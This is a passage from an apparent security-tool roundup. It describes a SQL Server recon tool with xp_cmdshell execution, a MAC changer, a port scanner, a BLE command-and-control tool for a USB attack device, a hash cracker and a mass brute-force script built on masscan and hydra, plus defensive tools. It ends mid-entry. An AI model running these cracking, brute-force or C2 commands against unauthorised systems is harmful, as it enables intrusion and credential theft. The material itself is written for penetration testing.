    users         [NORM] Enumerate users with database access [I,L]
    whoami        [NORM] Gather logged in user, mapped user and roles [I,L]
    xpcmd         [PRIV] Execute a system command using xp_cmdshell [I,L]

    Usage

    PySQLRecon has global options (available to any command), with some commands introducing additional flags. All global options must be specified before the command name:

    pysqlrecon [GLOBAL_OPTS] COMMAND [COMMAND_OPTS]

    View global options:

    pysqlrecon --help

    View command specific options:

    pysqlrecon [GLOBAL_OPTS] COMMAND --help

    Change the database authenticated to, or used in certain PySQLRecon commands (query, tables, columns, rows), with the --database flag.

    Target execution of a PySQLRecon command on a linked server (instead of the SQL server being authenticated to) using the --link flag.

    Impersonate a user account while running a PySQLRecon command with the --impersonate flag.

    --link and --impersonate are incompatible.

    Development

    pysqlrecon uses Poetry to manage dependencies. Install from source and set up for development with:

    git clone https://github.com/tw1sm/pysqlrecon
    cd pysqlrecon
    poetry install
    poetry run pysqlrecon --help

    Adding a Command

    PySQLRecon is easily extensible - see the template and instructions in resources

    TODO

    • Add SQLRecon SCCM commands
    • Add Azure SQL DB support?

    References and Credits



    MacMaster - MAC Address Changer

    By: Zion3R


    MacMaster is a versatile command line tool designed to change the MAC address of network interfaces on your system. It provides a simple yet powerful solution for network anonymity and testing.

    Features

    • Custom MAC Address: Set a specific MAC address to your network interface.
    • Random MAC Address: Generate and set a random MAC address.
    • Reset to Original: Reset the MAC address to its original hardware value.
    • Custom OUI: Set a custom Organizationally Unique Identifier (OUI) for the MAC address.
    • Version Information: Easily check the version of MacMaster you are using.

    Installation

    MacMaster requires Python 3.6 or later.

    1. Clone the repository:
      $ git clone https://github.com/HalilDeniz/MacMaster.git
    2. Navigate to the cloned directory:
      cd MacMaster
    3. Install the package:
      $ python setup.py install

    Usage

    $ macmaster --help
    usage: macmaster [-h] [--interface INTERFACE] [--version]
                     [--random | --newmac NEWMAC | --customoui CUSTOMOUI | --reset]

    MacMaster: Mac Address Changer

    options:
      -h, --help            show this help message and exit
      --interface INTERFACE, -i INTERFACE
                            Network interface to change MAC address
      --version, -V         Show the version of the program
      --random, -r          Set a random MAC address
      --newmac NEWMAC, -nm NEWMAC
                            Set a specific MAC address
      --customoui CUSTOMOUI, -co CUSTOMOUI
                            Set a custom OUI for the MAC address
      --reset, -rs          Reset MAC address to the original value

    Arguments

    • --interface, -i: Specify the network interface.
    • --random, -r: Set a random MAC address.
    • --newmac, -nm: Set a specific MAC address.
    • --customoui, -co: Set a custom OUI for the MAC address.
    • --reset, -rs: Reset MAC address to the original value.
    • --version, -V: Show the version of the program.
    1. Set a specific MAC address:
      $ macmaster.py -i eth0 -nm 00:11:22:33:44:55
    2. Set a random MAC address:
      $ macmaster.py -i eth0 -r
    3. Reset MAC address to its original value:
      $ macmaster.py -i eth0 -rs
    4. Set a custom OUI:
      $ macmaster.py -i eth0 -co 08:00:27
    5. Show program version:
      $ macmaster.py -V

    Replace eth0 with your desired network interface.

    Note

    You must run this script as root (or with sudo) for it to work properly, because changing a MAC address requires root privileges.
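    For context, changing a MAC address on Linux usually boils down to bringing the interface down, setting the new address and bringing it back up. The sketch below shows that generic flow with the ip tool via subprocess; it is an illustration of the approach, not MacMaster's implementation, and it must be run as root.

    import subprocess

    def set_mac(interface: str, new_mac: str) -> None:
        # Bring the interface down, change the address, bring it back up (requires root)
        subprocess.run(["ip", "link", "set", "dev", interface, "down"], check=True)
        subprocess.run(["ip", "link", "set", "dev", interface, "address", new_mac], check=True)
        subprocess.run(["ip", "link", "set", "dev", interface, "up"], check=True)

    set_mac("eth0", "00:11:22:33:44:55")  # same example values as above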

    Contributing

    Contributions are welcome! To contribute to MacMaster, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    For any inquiries or further information, you can reach me through the following channels:




    NetworkSherlock - Powerful And Flexible Port Scanning Tool With Shodan

    By: Zion3R


    NetworkSherlock is a powerful and flexible port scanning tool designed for network security professionals and penetration testers. With its advanced capabilities, NetworkSherlock can efficiently scan IP ranges, CIDR blocks, and multiple targets. It stands out with its detailed banner grabbing capabilities across various protocols and integration with Shodan, the world's premier service for scanning and analyzing internet-connected devices. This Shodan integration enables NetworkSherlock to provide enhanced scanning capabilities, giving users deeper insights into network vulnerabilities and potential threats. By combining local port scanning with Shodan's extensive database, NetworkSherlock offers a comprehensive tool for identifying and analyzing network security issues.


    Features

    • Scans multiple IPs, IP ranges, and CIDR blocks.
    • Supports port scanning over TCP and UDP protocols.
    • Detailed banner grabbing feature.
    • Ping check for identifying reachable targets.
    • Multi-threading support for fast scanning operations.
    • Option to save scan results to a file.
    • Provides detailed version information.
    • Colorful console output for better readability.
    • Shodan integration for enhanced scanning capabilities.
    • Configuration file support for Shodan API key.

    Installation

    NetworkSherlock requires Python 3.6 or later.

    1. Clone the repository:
      git clone https://github.com/HalilDeniz/NetworkSherlock.git
    2. Install the required packages:
      pip install -r requirements.txt

    Configuration

    Update the networksherlock.cfg file with your Shodan API key:

    [SHODAN]
    api_key = YOUR_SHODAN_API_KEY

    Usage

    python3 networksherlock.py --help
    usage: networksherlock.py [-h] [-p PORTS] [-t THREADS] [-P {tcp,udp}] [-V] [-s SAVE_RESULTS] [-c] target

    NetworkSherlock: Port Scan Tool

    positional arguments:
    target Target IP address(es), range, or CIDR (e.g., 192.168.1.1, 192.168.1.1-192.168.1.5,
    192.168.1.0/24)

    options:
    -h, --help show this help message and exit
    -p PORTS, --ports PORTS
    Ports to scan (e.g. 1-1024, 21,22,80, or 80)
    -t THREADS, --threads THREADS
    Number of threads to use
    -P {tcp,udp}, --protocol {tcp,udp}
    Protocol to use for scanning
    -V, --version-info Used to get version information
    -s SAVE_RESULTS, --save-results SAVE_RESULTS
    File to save scan results
    -c, --ping-check Perform ping check before scanning
    --use-shodan Enable Shodan integration for additional information

    Basic Parameters

    • target: The target IP address(es), IP range, or CIDR block to scan.
    • -p, --ports: Ports to scan (e.g., 1-1000, 22,80,443).
    • -t, --threads: Number of threads to use.
    • -P, --protocol: Protocol to use for scanning (tcp or udp).
    • -V, --version-info: Obtain version information during banner grabbing.
    • -s, --save-results: Save results to the specified file.
    • -c, --ping-check: Perform a ping check before scanning.
    • --use-shodan: Enable Shodan integration.

    Example Usage

    Basic Port Scan

    Scan a single IP address on default ports:

    python networksherlock.py 192.168.1.1

    Custom Port Range

    Scan an IP address with a custom range of ports:

    python networksherlock.py 192.168.1.1 -p 1-1024

    Multiple IPs and Port Specification

    Scan multiple IP addresses on specific ports:

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443

    CIDR Block Scan

    Scan an entire subnet using CIDR notation:

    python networksherlock.py 192.168.1.0/24 -p 80

    Using Multi-Threading

    Perform a scan using multiple threads for faster execution:

    python networksherlock.py 192.168.1.1-192.168.1.5 -p 1-1024 -t 20

    Scanning with Protocol Selection

    Scan using a specific protocol (TCP or UDP):

    python networksherlock.py 192.168.1.1 -p 53 -P udp

    Scan with Shodan

    python networksherlock.py 192.168.1.1 --use-shodan

    Scan Multiple Targets with Shodan

    python networksherlock.py 192.168.1.1,192.168.1.2 -p 22,80,443 -V --use-shodan

    Banner Grabbing and Save Results

    Perform a detailed scan with banner grabbing and save results to a file:

    python networksherlock.py 192.168.1.1 -p 1-1000 -V -s results.txt
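    Banner grabbing itself is conceptually simple: connect to the port and read whatever the service sends first. The sketch below shows that idea with Python sockets; it is a generic illustration, not NetworkSherlock's implementation, and the target is a placeholder.

    import socket

    def grab_banner(host: str, port: int, timeout: float = 2.0) -> str:
        # Connect and read the first bytes the service sends, if any
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                return s.recv(1024).decode(errors="ignore").strip()
            except socket.timeout:
                return ""  # some services (e.g. HTTP) wait for the client to speak first

    print(grab_banner("192.168.1.1", 22))  # placeholder target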

    Ping Check Before Scanning

    Scan an IP range after performing a ping check:

    python networksherlock.py 10.0.0.1-10.0.0.255 -c

    OUTPUT EXAMPLE

    $ python3 networksherlock.py 10.0.2.12 -t 25 -V -p 21-6000
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-6000
    Threads : 25
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    21 /tcp open telnet 220 (vsFTPd 2.3.4)
    80 /tcp open http HTTP/1.1 200 OK
    139 /tcp open netbios-ssn %SMBr
    25 /tcp open smtp 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
    23 /tcp open smtp #' #'
    445 /tcp open microsoft-ds %SMBr
    514 /tcp open shell
    512 /tcp open exec Where are you?
    1524/tcp open ingreslock ro ot@metasploitable:/#
    2121/tcp open iprop 220 ProFTPD 1.3.1 Server (Debian) [::ffff:10.0.2.12]
    3306/tcp open mysql >
    5900/tcp open unknown RFB 003.003
    53 /tcp open domain
    ---------------------------------------------

    Output Example

    $ python3 networksherlock.py 10.0.2.0/24 -t 10 -V -p 21-1000
    ********************************************
    Scanning target: 10.0.2.1
    Scanning IP : 10.0.2.1
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    53 /tcp open domain
    ********************************************
    Scanning target: 10.0.2.2
    Scanning IP : 10.0.2.2
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    445 /tcp open microsoft-ds
    135 /tcp open epmap
    ********************************************
    Scanning target: 10.0.2.12
    Scanning IP : 10.0.2.12
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    21 /tcp open ftp 220 (vsFTPd 2.3.4)
    22 /tcp open ssh SSH-2.0-OpenSSH_4.7p1 Debian-8ubuntu1
    23 /tcp open telnet #'
    80 /tcp open http HTTP/1.1 200 OK
    53 /tcp open kpasswd 464/udpcp
    445 /tcp open domain %SMBr
    3306/tcp open mysql >
    ********************************************
    Scanning target: 10.0.2.20
    Scanning IP : 10.0.2.20
    Ports : 21-1000
    Threads : 10
    Protocol : tcp
    ---------------------------------------------
    Port Status Service VERSION
    22 /tcp open ssh SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9

    Contributing

    Contributions are welcome! To contribute to NetworkSherlock, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact



    116 Malware Packages Found on PyPI Repository Infecting Windows and Linux Systems

    Cybersecurity researchers have identified a set of 116 malicious packages on the Python Package Index (PyPI) repository that are designed to infect Windows and Linux systems with a custom backdoor. "In some cases, the final payload is a variant of the infamous W4SP Stealer, or a simple clipboard monitor to steal cryptocurrency, or both," ESET researchers Marc-Etienne M.LΓ©veillΓ© and Rene

    New MrAnon Stealer Malware Targeting German Users via Booking-Themed Scam

    A phishing campaign has been observed delivering an information stealer malware called MrAnon Stealer to unsuspecting victims via seemingly benign booking-themed PDF lures. "This malware is a Python-based information stealer compressed with cx-Freeze to evade detection," Fortinet FortiGuard Labs researcher Cara Lin said. "MrAnon Stealer steals its victims' credentials, system

    Py-Amsi - Scan Strings Or Files For Malware Using The Windows Antimalware Scan Interface

    By: Zion3R


    py-amsi is a library that scans strings or files for malware using the Windows Antimalware Scan Interface (AMSI) API. AMSI is an interface native to Windows that allows applications to ask the antivirus installed on the system to analyse a file/string. AMSI is not tied to Windows Defender; antivirus providers implement the AMSI interface to receive calls from applications. This library takes advantage of the API to perform antivirus scans in Python. Read more about the Windows AMSI API here.


    Installation

    • Via pip

      pip install pyamsi
    • Clone repository

      git clone https://github.com/Tomiwa-Ot/py-amsi.git
      cd py-amsi/
      python setup.py install

    Usage

    from pyamsi import Amsi

    # Scan a file
    Amsi.scan_file(file_path, debug=True) # debug is optional and False by default

    # Scan string
    Amsi.scan_string(string, string_name, debug=False) # debug is optional and False by default

    # Both functions return a dictionary of the format
    # {
    # 'Sample Size' : 68, // The string/file size in bytes
    # 'Risk Level' : 0, // The risk level as suggested by the antivirus
    # 'Message' : 'File is clean' // Response message
    # }
    Risk Level   Meaning
    0            AMSI_RESULT_CLEAN (File is clean)
    1            AMSI_RESULT_NOT_DETECTED (No threat detected)
    16384        AMSI_RESULT_BLOCKED_BY_ADMIN_START (Threat is blocked by the administrator)
    20479        AMSI_RESULT_BLOCKED_BY_ADMIN_END (Threat is blocked by the administrator)
    32768        AMSI_RESULT_DETECTED (File is considered malware)
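    Putting the documented return format and risk levels together, a caller might evaluate a scan roughly as in the sketch below (Windows only, with an AMSI-capable antivirus installed); the thresholds simply follow the table above.

    from pyamsi import Amsi

    result = Amsi.scan_string("some suspicious string", "sample_string")

    if result["Risk Level"] >= 32768:
        print("Malicious:", result["Message"])
    elif result["Risk Level"] in (0, 1):
        print("Clean:", result["Message"])
    else:
        print("Blocked or inconclusive:", result["Message"])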

    Docs

    https://tomiwa-ot.github.io/py-amsi/index.html



    BlueBunny - BLE Based C2 For Hak5's Bash Bunny

    By: Zion3R


    C2 solution that communicates directly over Bluetooth-Low-Energy with your Bash Bunny Mark II.
    Send your Bash Bunny all the instructions it needs just over the air.

    Overview

    Structure


    Installation & Start

    1. Install required dependencies:
       pip install pygatt "pygatt[GATTTOOL]"

       Make sure BlueZ is installed and gatttool is usable:
       sudo apt install bluez

    2. Download BlueBunny's repository (and switch into the correct folder):
       git clone https://github.com/90N45-d3v/BlueBunny
       cd BlueBunny/C2

    3. Start the C2 server:
       sudo python c2-server.py

    4. Plug your Bash Bunny with the BlueBunny payload into the target machine (payload at: BlueBunny/payload.txt).

    5. Visit your C2 server from your browser on localhost:1472 and connect your Bash Bunny (your Bash Bunny will light up green when it's ready to pair).

    Manual communication with the Bash Bunny through Python

    You can use BlueBunny's BLE backend and communicate with your Bash Bunny manually.

    Example Code

    # Import the backend (BlueBunny/C2/BunnyLE.py)
    import BunnyLE

    # Define the data to send
    data = "QUACK STRING I love my Bash Bunny"
    # Define the type of the data to send ("cmd" or "payload") (payload data will be temporarily written to a file, to execute multiple commands like in a payload script file)
    d_type = "cmd"

    # Initialize BunnyLE
    BunnyLE.init()

    # Connect to your Bash Bunny
    bb = BunnyLE.connect()

    # Send the data and let it execute
    BunnyLE.send(bb, data, d_type)

    Troubleshooting

    Connecting your Bash Bunny doesn't work? Try the following instructions:

    • Try connecting a few more times
    • Check if your bluetooth adapter is available
    • Restart the system your C2 server is running on
    • Check if your Bash Bunny is running the BlueBunny payload properly
    • How far away from your Bash Bunny are you? Is the environment (distance, interferences etc.) still sustainable for typical BLE connections?

    Bugs within BlueZ

    The Bluetooth stack used is well known, but also very buggy. If starting the connection with your Bash Bunny does not work, it is probably a temporary problem caused by BlueZ. Below are some kinds of errors that can be caused by such temporary bugs. They usually disappear at the latest after rebooting the C2's operating system, so don't be surprised, and stay calm if they show up.

    • Timeout after 5.0 seconds
    • Unknown error while scanning for BLE devices

    Working on...

    • Remote shell access
    • BLE exfiltration channel
    • Improved connecting process

    Additional information

    As I said, BlueZ, the base for the Bluetooth part used in BlueBunny, is somewhat bug-prone. If you encounter any non-temporary bugs when connecting to the Bash Bunny, as well as any other bugs/difficulties in the whole BlueBunny project, you are always welcome to contact me. Be it a problem, an idea/solution, or just some nice feedback.



    PassBreaker - Command-line Password Cracking Tool Developed In Python

    By: Zion3R


    PassBreaker is a command-line password cracking tool developed in Python. It allows you to perform various password cracking techniques such as wordlist-based attacks and brute force attacks.

    Features

    • Wordlist-based password cracking
    • Brute force password cracking
    • Support for multiple hash algorithms
    • Optional salt value
    • Parallel processing option for faster cracking
    • Password complexity evaluation
    • Customizable minimum and maximum password length
    • Customizable character set for brute force attacks

    Installation

    1. Clone the repository:

      git clone https://github.com/HalilDeniz/PassBreaker.git
    2. Install the required dependencies:

      pip install -r requirements.txt

    Usage

    python passbreaker.py <password_hash> <wordlist_file> [--algorithm]

    Replace <password_hash> with the target password hash and <wordlist_file> with the path to the wordlist file containing potential passwords.

    Options

    • --algorithm <algorithm>: Specify the hash algorithm to use (e.g., md5, sha256, sha512).
    • -s, --salt <salt>: Specify a salt value to use.
    • -p, --parallel: Enable parallel processing for faster cracking.
    • -c, --complexity: Evaluate password complexity before cracking.
    • -b, --brute-force: Perform a brute force attack.
    • --min-length <min_length>: Set the minimum password length for brute force attacks.
    • --max-length <max_length>: Set the maximum password length for brute force attacks.
    • --character-set <character_set>: Set the character set to use for brute force attacks.


    Usage Examples

    Wordlist-based Password Cracking

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5

    This command attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the MD5 algorithm and a wordlist from the "passwords.txt" file.
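    Conceptually, a wordlist attack just hashes each candidate and compares it to the target; the minimal sketch below shows that logic with hashlib. It is not PassBreaker's code, only an illustration of the technique using the same example hash and wordlist file name.

    import hashlib

    target = "5f4dcc3b5aa765d61d8327deb882cf99"  # same MD5 hash as in the example above

    with open("passwords.txt", encoding="utf-8", errors="ignore") as wordlist:
        for candidate in wordlist:
            candidate = candidate.strip()
            if hashlib.md5(candidate.encode()).hexdigest() == target:
                print("Password found:", candidate)
                break
        else:
            print("Password not in wordlist")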

    Brute Force Attack

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 --brute-force --min-length 6 --max-length 8 --character-set abc123

    This command performs a brute force attack to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" by trying all possible combinations of passwords with a length between 6 and 8 characters, using the character set "abc123".

    Password Complexity Evaluation

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha256 --complexity

    This command evaluates the complexity of passwords in the "passwords.txt" file and attempts to crack the password with the hash value "5f4dcc3b5aa765d61d8327deb882cf99" using the SHA-256 algorithm. It only tries passwords that meet the complexity requirements.

    Using Salt Value

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm md5 --salt mysalt123

    This command uses a specific salt value ("mysalt123") for the password cracking process. Salt is used to enhance the security of passwords.

    Parallel Processing

    python passbreaker.py 5f4dcc3b5aa765d61d8327deb882cf99 passwords.txt --algorithm sha512 --parallel

    This command performs password cracking with parallel processing for faster cracking. It utilizes multiple processing cores, but it may consume more system resources.

    These examples demonstrate different features and use cases of the "PassBreaker" password cracking tool. Users can customize the parameters based on their needs and goals.

    Disclaimer

    This tool is intended for educational and ethical purposes only. Misuse of this tool for any malicious activities is strictly prohibited. The developers assume no liability and are not responsible for any misuse or damage caused by this tool.

    Contributing

    Contributions are welcome! To contribute to PassBreaker, follow these steps:

    1. Fork the repository.
    2. Create a new branch for your feature or bug fix.
    3. Make your changes and commit them.
    4. Push your changes to your forked repository.
    5. Open a pull request in the main repository.

    Contact

    If you have any questions, comments, or suggestions about PassBreaker, please feel free to contact me:

    License

    PassBreaker is released under the MIT License. See LICENSE for more information.



    T3SF - Technical Tabletop Exercises Simulation Framework

    By: Zion3R


    T3SF is a framework that offers a modular structure for the orchestration of events based on a master scenario events list (MSEL), together with a set of rules defined for each exercise (optional) and a configuration that allows defining the parameters of the corresponding platform. The main module communicates with the platform-specific module (Discord, Slack, Telegram, etc.), which presents the events in the input channels as injects for each platform. In addition, the framework supports different use cases: "single organization, multiple areas", "multiple organizations, single area" and "multiple organizations, multiple areas".


    Getting Things Ready

    To use the framework with your desired platform, whether it's Slack or Discord, you will need to install the required modules for that platform. But don't worry, installing these modules is easy and straightforward.

    To do this, you can follow this simple step-by-step guide, or if you're already comfortable installing packages with pip, you can skip to the last step!

    # Python 3.6+ required
    python -m venv .venv # We will create a python virtual environment
    source .venv/bin/activate # Let's get inside it

    pip install -U pip # Upgrade pip

    Once you have created a Python virtual environment and activated it, you can install the T3SF framework for your desired platform by running the following command:

    pip install "T3SF[Discord]"  # Install the framework to work with Discord

    or

    pip install "T3SF[Slack]"  # Install the framework to work with Slack

    This will install the T3SF framework along with the required dependencies for your chosen platform. Once the installation is complete, you can start using the framework with your platform of choice.

    We strongly recommend following the platform-specific guidance within our Read The Docs! Here are the links:

    Usage

    We created this framework to simplify all your work!

    Using Docker

    Supported Tags

    • slack → This image has all the requirements to perform an exercise in Slack.
    • discord → This image has all the requirements to perform an exercise in Discord.

    Using it with Slack

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:slack

    Inside your .env file you have to provide the SLACK_BOT_TOKEN and SLACK_APP_TOKEN tokens. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.
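
    For reference, a minimal .env for the Slack image could look like the following (the token values are placeholders; MSEL_PATH only needs changing if you mount the MSEL somewhere else):

    SLACK_BOT_TOKEN=xoxb-your-bot-token
    SLACK_APP_TOKEN=xapp-your-app-token
    MSEL_PATH=/app/MSEL.json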

    Using it with Discord

    $ docker run --rm -t --env-file .env -v $(pwd)/MSEL.json:/app/MSEL.json base4sec/t3sf:discord

    Inside your .env file you have to provide the DISCORD_TOKEN token. Read more about it here.

    There is another environment variable to set, MSEL_PATH. This variable tells the framework in which path the MSEL is located. By default, the container path is /app/MSEL.json. If you change the mount location of the volume then also change the variable.


    Once you have everything ready, use our template for the main.py, or modify the following code:

    Here is an example if you want to run the framework with the Discord bot and a GUI.

    from T3SF import T3SF
    import asyncio

    async def main():
        await T3SF.start(MSEL="MSEL_TTX.json", platform="Discord", gui=True)

    if __name__ == '__main__':
        asyncio.run(main())

    Or if you prefer to run the framework without GUI and with Slack instead, you can modify the arguments, and that's it!

    Yes, that simple!

    await T3SF.start(MSEL="MSEL_TTX.json", platform="Slack", gui=False)

    If you need more help, you can always check our documentation here!



    Mass-Bruter - Mass Bruteforce Network Protocols

    By: Zion3R


    Mass bruteforce network protocols

    Info

    A simple personal script to quickly mass bruteforce common services across a large network range.
    It will check for default credentials on FTP, SSH, MySQL, MSSQL, etc.
    This was made for authorized red team penetration testing purposes only.


    How it works

    1. Use masscan (faster than nmap) to find alive hosts with common ports in the network segment.
    2. Parse IPs and ports from the masscan result.
    3. Craft and run hydra commands to automatically bruteforce supported network services on the devices (see the sketch after this list).
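
    To make steps 2 and 3 concrete, here is a hedged sketch (not the actual mass_bruteforce.py code) that parses masscan's "Discovered open port" lines and crafts hydra commands; the wordlist paths and output locations are illustrative assumptions:

    import re
    from pathlib import Path

    SERVICE_BY_PORT = {21: "ftp", 22: "ssh", 23: "telnet", 3306: "mysql", 1433: "mssql"}
    LINE_RE = re.compile(r"Discovered open port (\d+)/tcp on ([\d.]+)")

    def parse_masscan(path):
        """Yield (ip, port) pairs from a saved masscan output file."""
        for line in Path(path).read_text().splitlines():
            m = LINE_RE.search(line)
            if m:
                yield m.group(2), int(m.group(1))

    def hydra_commands(masscan_file, userlist="users.txt", passlist="passwords.txt"):
        # Build one hydra command per (host, service) pair found by masscan.
        for ip, port in parse_masscan(masscan_file):
            service = SERVICE_BY_PORT.get(port)
            if service:
                yield (f"hydra -L {userlist} -P {passlist} -s {port} "
                       f"-o result/hydra_{service}_{ip}.txt {service}://{ip}")

    if __name__ == "__main__":
        for cmd in hydra_commands("./result/masscan/masscan_test.txt"):
            print(cmd)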

    Requirements

    • Kali Linux or any preferred Linux distribution
    • Python 3.10+
    # Clone the repo
    git clone https://github.com/opabravo/mass-bruter
    cd mass-bruter

    # Install required tools for the script
    apt update && apt install seclists masscan hydra

    How To Use

    Private IP ranges: 10.0.0.0/8, 192.168.0.0/16, 172.16.0.0/12

    Save masscan results under ./result/masscan/, with the format masscan_<name>.<ext>

    Ex: masscan_192.168.0.0-16.txt

    Example command:

    masscan -p 3306,1433,21,22,23,445,3389,5900,6379,27017,5432,5984,11211,9200,1521 172.16.0.0/12 | tee ./result/masscan/masscan_test.txt

    Example Resume Command:

    masscan --resume paused.conf | tee -a ./result/masscan/masscan_test.txt

    Command Options

    β”Œβ”€β”€(rootγ‰Ώroot)-[~/mass-bruter]
    └─# python3 mass_bruteforce.py
    Usage: [OPTIONS]

    Mass Bruteforce Script

    Options:
    -q, --quick           Quick mode (Only brute telnet, ssh, ftp, mysql,
                          mssql, postgres, oracle)
    -a, --all             Brute all services (Very Slow)
    -s, --show            Show result with successful login
    -f, --file-path PATH  The directory or file that contains masscan result
                          [default: ./result/masscan/]
    --help                Show this message and exit.

    Quick Bruteforce Example:

    python3 mass_bruteforce.py -q -f ~/masscan_script.txt

    Fetch cracked credentials:

    python3 mass_bruteforce.py -s

    Todo

    • Migrate with dpl4hydra
    • Optimize the code and functions
    • MultiProcessing

    Any contributions are welcome!



    CureIAM - Clean Accounts Over Permissions In GCP Infra At Scale

    By: Zion3R

    Automated clean-up of over-permissioned IAM accounts on GCP infra

    CureIAM is an easy-to-use, reliable, and performant engine for Least Privilege Principle enforcement on GCP cloud infra. It enables DevOps and security teams to quickly clean up accounts in GCP infra that have been granted more permissions than they require. CureIAM fetches recommendations and insights from the GCP IAM recommender, scores them, and enforces those recommendations automatically on a daily basis. It takes care of scheduling and all other aspects of running these enforcement jobs at scale. It is built on top of the GCP IAM recommender APIs and the Cloudmarker framework.


    Key features

    Discover what makes CureIAM scalable and production grade.

    • Config driven: The entire workflow of CureIAM is config driven. Skip to the Config section to know more about it.
    • Scalable: It is designed to scale because of its plugin-driven, multiprocess, and multi-threaded approach.
    • Handles scheduling: Scheduling is embedded in the CureIAM code itself; configure the time, and CureIAM will run daily at that time.
    • Plugin driven: The CureIAM codebase is completely plugin oriented, which means one can plug and play the existing plugins or create new ones to add more functionality.
    • Track actionable insights: Every action that CureIAM takes is recorded for audit purposes. It can do that in the file store and in the Elasticsearch store. If you want, you can build other store plugins to push those records to other stores for tracking purposes.
    • Scoring and enforcement: Every recommendation fetched by CureIAM is scored against various parameters, producing scores such as safe_to_apply_score, risk_score, and over_privilege_score. Each score serves a different purpose: safe_to_apply_score determines whether a recommendation can be applied automatically, based on the threshold set in the CureIAM.yaml config file (see the sketch after this list).
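
    A minimal illustration of how such a threshold could gate automatic enforcement (a hedged sketch, not CureIAM's actual code; the thresholds mirror the min_safe_to_apply_score_* keys shown later in the Config section, and the recommendation field names are hypothetical):

    # Per-account-type thresholds, as configured in CureIAM.yaml (illustrative values).
    MIN_SAFE_TO_APPLY = {"user": 0, "group": 0, "serviceAccount": 50}

    def should_auto_apply(recommendation: dict) -> bool:
        # `account_type` and `safe_to_apply_score` are hypothetical field names.
        threshold = MIN_SAFE_TO_APPLY.get(recommendation["account_type"], 100)
        return recommendation["safe_to_apply_score"] >= threshold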

    Usage

    Since CureIAM is built with Python, you can run it locally with these commands. Before running, make sure a configuration file is ready in one of /etc/CureIAM.yaml, ~/.CureIAM.yaml, ~/CureIAM.yaml, or CureIAM.yaml, and that a service account JSON file is present in the current directory, preferably named cureiamSA.json. This SA private key can be named anything, but for the Docker image build it is preferred to use this name. Make sure to reference this file in the config for the GCP cloud plugin.

    # Install necessary dependencies
    $ pip install -r requirements.txt

    # Run CureIAM now
    $ python -m CureIAM -n

    # Run CureIAM process as scheduler
    $ python -m CureIAM

    # Check CureIAM help
    $ python -m CureIAM --help

    CureIAM can also be run inside a Docker environment; this is completely optional and can be used for CI/CD with a K8s cluster deployment.

    # Build docker image from dockerfile
    $ docker build -t cureiam .

    # Run the image, as scheduler
    $ docker run -d cureiam

    # Run the image now
    $ docker run -f cureiam -m cureiam -n

    Config

    The CureIAM.yaml configuration file is the heart of the CureIAM engine. Everything the engine does is based on the pipeline configured in this config file. Let's break it down into different sections to make the config look simpler.

    1. Let's configure the first section: logging and scheduler configuration.
      logger:
        version: 1

        disable_existing_loggers: false

        formatters:
          verysimple:
            format: >-
              [%(process)s]
              %(name)s:%(lineno)d - %(message)s
            datefmt: "%Y-%m-%d %H:%M:%S"

        handlers:
          rich_console:
            class: rich.logging.RichHandler
            formatter: verysimple

          file:
            class: logging.handlers.TimedRotatingFileHandler
            formatter: simple
            filename: /tmp/CureIAM.log
            when: midnight
            encoding: utf8
            backupCount: 5

        loggers:
          adal-python:
            level: INFO

        root:
          level: INFO
          handlers:
            - rich_console
            - file

      schedule: "16:00"

    This subsection of the config uses the Rich logging module and schedules CureIAM to run daily at 16:00.

    2. The next section configures the different modules which we MIGHT use in the pipeline. This falls under the plugins section in CureIAM.yaml. You can think of this section as the declaration of the different plugins.
      plugins:
        gcpCloud:
          plugin: CureIAM.plugins.gcp.gcpcloud.GCPCloudIAMRecommendations
          params:
            key_file_path: cureiamSA.json

        filestore:
          plugin: CureIAM.plugins.files.filestore.FileStore

        gcpIamProcessor:
          plugin: CureIAM.plugins.gcp.gcpcloudiam.GCPIAMRecommendationProcessor
          params:
            mode_scan: true
            mode_enforce: true
            enforcer:
              key_file_path: cureiamSA.json
              allowlist_projects:
                - alpha
              blocklist_projects:
                - beta
              blocklist_accounts:
                - foo@bar.com
              allowlist_account_types:
                - user
                - group
                - serviceAccount
              blocklist_account_types:
                - None
              min_safe_to_apply_score_user: 0
              min_safe_to_apply_score_group: 0
              min_safe_to_apply_score_SA: 50

        esstore:
          plugin: CureIAM.plugins.elastic.esstore.EsStore
          params:
            # Change http to https later if your elastic is using https
            scheme: http
            host: es-host.com
            port: 9200
            index: cureiam-stg
            username: security
            password: securepassword

    Each of these plugin declarations has to be of this form:

      plugins:
        <plugin-name>:
          plugin: <class-name-as-python-path>
          params:
            param1: val1
            param2: val2
    For example, for the plugin CureIAM.stores.esstore.EsStore, the class in that file is EsStore. All the params defined in the YAML have to match the parameters declared in the __init__() function of that plugin class.
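
    As an illustration, a minimal store plugin whose __init__() mirrors the params shown for the esstore plugin above might look like the following (a hedged sketch, not the real EsStore class):

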